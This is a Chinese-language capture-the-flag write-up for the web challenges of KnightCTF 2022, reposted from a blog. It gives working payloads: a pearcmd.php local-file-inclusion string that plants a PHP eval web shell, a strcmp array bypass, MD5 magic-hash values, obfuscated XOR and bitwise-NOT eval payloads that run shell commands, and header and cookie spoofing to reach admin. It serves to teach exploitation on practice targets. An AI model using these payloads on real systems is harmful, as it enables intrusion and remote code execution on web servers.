标签:WEB code echo FLAG KCTF KnightCTF pass POST
前言
不难,就是fuzz和脑洞有点多
Do Something Special
按钮点击发现url转到 /gr@b_y#ur_fl@g_h3r3! ,# 明显不对,将其urlencode转码为%23访问出现flag
Flag:KCTF{Sp3cial_characters_need_t0_get_Url_enc0ded}
My PHP Site
文件包含,可以利用伪协议读源码,也可以直接打pearcmd.php来getshell
payload
/?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/shell.php+-d+man_dir=<?eval($_POST[0]);?>+-s+
再去包含执行命令
FLAG: KCTF{L0C4L_F1L3_1ncLu710n}
Obsfuscation Isn’t Enough
查看html发现jsfuck
解密发现 150484514b6eeb1d99da836d95f6671d.php
直接访问php文件
FLAG: KCTF{0bfuscat3d_J4v4Scr1pt_aka_JSFuck}
Zero is not the limit
Hint: /user/
开始返回一堆json
/user/ 下对应每一个用户,访问-1出flag
FLAG: KCTF{tHeRe_1s_n0_l1m1t}
Find Pass Code – 1
发现注释:
Hi Serafin, I learned something new today.
I build this website for you to verify our KnightCTF 2022 pass code. You can view the source code by sending the source param
访问:url/?source得到源码
<?php
require "flag.php";
if (isset($_POST["pass_code"])) {
if (strcmp($_POST["pass_code"], $flag) == 0) {
echo "KCTF Flag : {$flag}";
} else {
echo "Oh....My....God. You entered the wrong pass code.<br>";
}
}
if (isset($_GET["source"])) {
print show_source(__FILE__);
}
?>
数组bypass,Post: pass_code[]=1
FLAG: KCTF{ShOuLd_We_UsE_sTrCmP_lIkE_tHaT}
Most Secure Calculator-1
源码
<?php
if (isset($_POST["equation"]) && !is_array($_POST["equation"])) {
if (empty($_POST["equation"])) {
echo "Please enter some eqation.";
} else {
if (strlen($_POST["equation"]) >= 25) {
echo "Oow ! You have entered an equation that is too big for me.";
} else {
echo "<h1> Result : <br>";
eval("echo " . $_POST["equation"] . ";");
echo "</h1>";
}}}
?>
直接塞到eval
FLAG:KCTF{WaS_mY_cAlCuLaToR_sAfE}
Find Pass Code - 2
- 魔术hash
- md5
<?php
require "flag.php";
$old_pass_codes = array("0e215962017", "0e730083352", "0e807097110", "0e840922711");
$old_pass_flag = false;
if (isset($_POST["pass_code"]) && !is_array($_POST["pass_code"])) {
foreach ($old_pass_codes as $old_pass_code) {
if ($_POST["pass_code"] === $old_pass_code) {
$old_pass_flag = true;
break;
}
}
if ($old_pass_flag) {
echo "Sorry ! It's an old pass code.";
} else if ($_POST["pass_code"] == md5($_POST["pass_code"])) {
echo "KCTF Flag : {$flag}";
} else {
echo "Oh....My....God. You entered the wrong pass code.<br>";
}
}
if (isset($_GET["source"])) {
print show_source(__FILE__);
}
?>
爆破是不可能爆破的,搜集了魔术hash,随便挑个
魔术hash
0e215962017:0e291242476940776845150308577824
0e730083352:0e870635875304277170259950255928
0e807097110:0e318093639164485566453180786895
0e840922711:00e64922204642369621338070008986
0e1137126905:0e291659922323405260514745084877
0e1284838308:0e708279691820928818722257405159
0e2799298535:0e258310720843549656960157258725
0e3335999050:0e130023719718288785799459522477
0e3519466817:0e094940930906507337180165634011
FLAG:KCTF{ShOuD_wE_cOmPaRe_MD5_LiKe_ThAt__Be_SmArT}
Bypass!! Bypass!! Bypass!!
注释发现
<!-- generats auth token -> /api/request/auth_token -->
经过尝试bypass 403 失败
/api/request/auth_token Allow: POST, OPTIONS
/ Allow: GET, HEAD, OPTIONS
Github搜索得到源码 bug-bounty-labs
添加头部
X-Authorized-For: 获取的token
FLAG:KCTF{cOngRatUlaT10Ns_wElCoMe_t0_y0ur_daShBoaRd}
Most Secure Calculator -2
只允许字母数字,那就是异或 取反绕过,fuzz以下构造命令
payload
(~%8C%86%8C%8B%9A%92)(~%D7%DD%8F%88%9B%DD%D6%C4)
("393480"^"@@@@]]")(("8!4@80!8"^"[@@`^@_").(".").("484"^"@@@"))
"\163\171\163\164\145\155"("\143\141\164\40\146\154\141\147\56\164\170\164")
FLAG: KCTF{sHoUlD_I_uSe_eVaL_lIkE_tHaT}
Can you be Admin?
User-Agent: KnightSquad
接着
Referer: localhost
Jsfuck 发现 Unicode,Unicode编码解码 (bt.cn)
F`V,7DIIBn+?CWe@<,q!$?0EpF*DPCA0<oU8RZI/DJ<`sF8
然后ascii85解码, ASCII85解码计算器
username : tareq ,password : IamKnight
登录后是普通用户,然后返回包cookie返回奇怪字段base64后重新更改为Admin,发包 发现flag
FLAG: KCTF{FiN4LlY_y0u_ar3_4dm1N}
标签:WEB,code,echo,FLAG,KCTF,KnightCTF,pass,POST 来源: https://blog.csdn.net/qq_53263789/article/details/122642289
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。